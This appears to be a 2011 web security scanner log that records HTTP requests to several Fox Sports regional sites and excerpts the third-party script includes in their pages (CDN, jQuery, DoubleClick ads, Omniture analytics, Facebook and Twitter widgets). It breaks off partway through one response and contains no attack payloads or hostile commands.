HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:39 GMT Server: Apache Set-Cookie: PHPSESSID=807fffd592a9bf6fb7d8e7c887d5cf39; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 73519
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:38 GMT Server: Apache Set-Cookie: PHPSESSID=dce594637b946858ac8562e11cd29bfc; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 51085
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/appjs/~1294839306/s=main~thePlatform^swfobject~ugc/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1294849838?" type="text/javascript"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1294849838?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET / HTTP/1.1 Host: www.foxsportscarolinas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 12 Jan 2011 16:30:48 GMT Date: Wed, 12 Jan 2011 16:30:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PHPSESSID=3271d39cc8617c11fa58992b3826f5a0; path=/ Content-Length: 67154
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <div id = "main_187"> <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.carolinas/main;tile=3;sz=300x250;ord=1294849844?" type="text/javascript"></script> ...[SNIP]...
GET / HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:23:03 GMT Server: Apache Set-Cookie: PHPSESSID=f98e5e7a4e031dcbf5dbf7acff41bb35; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 74214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appjs/~1294849066/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~flicker/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <div id = "main_187"> <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.detroit/main;tile=3;sz=300x250;ord=1294849825?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET /01/11/11/Hoke-who/landing.html HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:26:41 GMT Server: Apache Set-Cookie: PHPSESSID=05e45841134be0f8e849c03d0475b24f; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 50741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appjs/~1294849066/s=main~thePlatform^swfobject~ugc/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849601?" type="text/javascript"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849601?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET /01/11/11/Hoke-who/landing.html?blockID=389355&feedID=3701 HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:23:05 GMT Server: Apache Set-Cookie: PHPSESSID=85ff0994810525300d4e54d63c899e70; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 66884
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appjs/~1294849066/s=main~thePlatform^swfobject~ugc~comment_box/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849838?" type="text/javascript"></script> ...[SNIP]... </a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849838?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html?blockID=389326&feedID=3701 HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:48 GMT Server: Apache Set-Cookie: PHPSESSID=539c0237c90a637a856e33299aeaf9bb; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 62871
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appjs/~1294849066/s=main~thePlatform^swfobject~ugc~comment_box/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849808?" type="text/javascript"></script> ...[SNIP]... </a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849809?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:47 GMT Server: Apache Set-Cookie: PHPSESSID=f7fa2ad3beef39ba25d4799d4abff0a5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 50741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appjs/~1294849066/s=main~thePlatform^swfobject~ugc/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849601?" type="text/javascript"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849601?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET / HTTP/1.1 Host: www.foxsportsflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:50 GMT Server: Apache Set-Cookie: PHPSESSID=aac2f23f8215a809567600eb37ffca51; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 76322
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/appjs/~1294841769/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~flashobject~ugc~flicker/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <div id = "main_187"> <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.florida/main;tile=3;sz=300x250;ord=1294849850?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html HTTP/1.1 Host: www.foxsportsflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:50 GMT Server: Apache Set-Cookie: PHPSESSID=552dd2fb6e357039c005c0bb8665d203; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 47665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/appjs/~1294841769/s=main~thePlatform^swfobject~flashobject/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.florida/landing_reiter;tile=3;sz=728x90;ord=1294849851?" type="text/javascript"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.florida/landing_reiter;tile=3;sz=300x250;ord=1294849851?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html?blockID=388962&feedID=7926 HTTP/1.1 Host: www.foxsportsflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:26:53 GMT Server: Apache Set-Cookie: PHPSESSID=e13925e027f6802b91cb1759a97c21c0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 69118
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/appjs/~1294841769/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~comment_box~flashobject/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.florida/landing_reiter;tile=3;sz=728x90;ord=1294849805?" type="text/javascript"></script> ...[SNIP]... </a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.florida/landing_reiter;tile=3;sz=300x250;ord=1294849805?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET / HTTP/1.1 Host: www.foxsportshouston.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:56 GMT Server: Apache Set-Cookie: PHPSESSID=d3f0a37aad79eca82e7871d6bfdcad10; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 69986
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxhoust/common/appjs/~1294842442/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~flicker/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <div id = "main_187"> <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.houston/main;tile=3;sz=300x250;ord=1294849857?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxhoust/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET / HTTP/1.1 Host: www.foxsportskansascity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:56 GMT Server: Apache Set-Cookie: PHPSESSID=9d01435dbe7e17e2b982f0304dd0dd69; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 67136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/fsskansa/common/appjs/~1294848598/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~flicker/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <div id = "main_187"> <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.kansascity/main;tile=3;sz=300x250;ord=1294849857?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/fsskansa/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET / HTTP/1.1 Host: www.foxsportsmidwest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:56 GMT Server: Apache Set-Cookie: PHPSESSID=be186108f22ff29fc5206079350ee590; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 76839
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... 28~custom_classes~component_masthead~component_feedtemplate_3box_undercp~component_feedtemplate_310~component_right_generic~component_footer/g=style~flicker/ucdn=1" rel="stylesheet" type="text/css" /> <script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxmwes/common/appjs/~1294848892/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~flicker/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <div id = "main_187"> <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.midwest/main;tile=3;sz=300x250;ord=1294849817?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxmwes/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET / HTTP/1.1 Host: www.foxsportsohio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:02 GMT Server: Apache Set-Cookie: PHPSESSID=090a220f00fee006a09844523813c3f9; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 78763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
